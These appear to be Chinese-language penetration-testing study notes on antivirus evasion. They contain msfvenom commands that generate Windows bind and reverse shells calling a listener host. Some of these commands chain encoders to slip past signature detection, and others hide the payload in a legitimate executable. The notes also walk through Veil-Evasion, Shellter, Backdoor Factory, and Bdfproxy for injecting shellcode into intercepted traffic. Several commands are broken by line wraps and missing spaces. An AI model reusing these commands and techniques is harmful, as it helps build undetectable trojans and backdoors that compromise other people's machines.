免杀
恶意程序最主要的防护手段
杀毒软甲/防病毒软件
客户端/服务器/邮件防病毒
检测原理
基于二进制文件中特征签名的黑名单检测方法
基于行为的分析方法(启发式)
修改二进制文件中的特征字符
替换、擦除、修改
加密技术
通过加密使得特征字符不可读,从而逃避AV检测
运行时分片分段的解密执行,注入进程火AV不检查的无害文件中
防病毒软件的检测
而已程序本身的特征字符
加密器crypter的特征字符
RAT软件
远程访问特洛伊木马是一种恶意软件,能够让黑客监视和控制您的计算机、网络设备甚至整个网络
生成反弹shell
msfvenom -pwindows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --
platform win -f exe -o a.exe
加密编码反弹shell
msfvenom -pwindows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e
x86/shikata_ga_nai -i 5 | msfvenom -a x86--platform windows -e x86/
countdown -i 8 -f raw | msfvenom -a x86--platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -oa.exe
引用模板隐藏shell
msfvenom -p windows/shell_reverse_tcp -x/usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -oa.exe
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86--
platform win -f exe > b.exe
Veil-evasion(Veil-framework框架的一部分)
由python语言编写
用于自动生成免杀
集成msf paypload,支持自定义payload
集成各种注入技术
集成各种第三方工具
Hypersion、PEScrambler、BackDoor Factory
继承各种开发打包运行环境
python:pyinstaller/py2exe
c#:mono for.NET
c:mingw32
安装
apt-get install veil-evasion
如何使用
Veil-Evasion下载、安装、使用教程 - 付杰博客 (fujieace.com)
传统防病毒查杀原理
查找文件体重特殊字符串,匹配规则查杀
找到触发AV查杀的精确字符串,并将其修改
将执行程序分片成很多小片段
将包含MZ头的第一个片段与后续片段依次组合后交给AV查杀
重复以上步骤,最终精确定位出
shellter(免杀工具)
kali 免杀工具shellter安装以及使用 -We3sT - 博客园 (cnblogs.com)
代码混淆
定制的编码方式
多态编码
集成部分msf payload
目前只支持32为PE程序
使用正常的exe文件作为模板,将payload代码加入模板内
模板程序的功能将失效
Backdoor-factory(后门工具)
backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。
backdoor-factory详细使用教程_星落.的博客-CSDN博客_backdoor-factory
Bdfproxy
Kalilinux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21_思源湖的鱼的博客-CSDN博客_bdfproxy
集成mitmproxy
基于流量劫持(中间人攻击)动态注入shellcode(ARP spoof、DNSspoof、Fake AP)
启动路由功能进行流量劫持
代理端口是8080,故把所有流量都转到8080端口
启动bdfproxy,使得shell反弹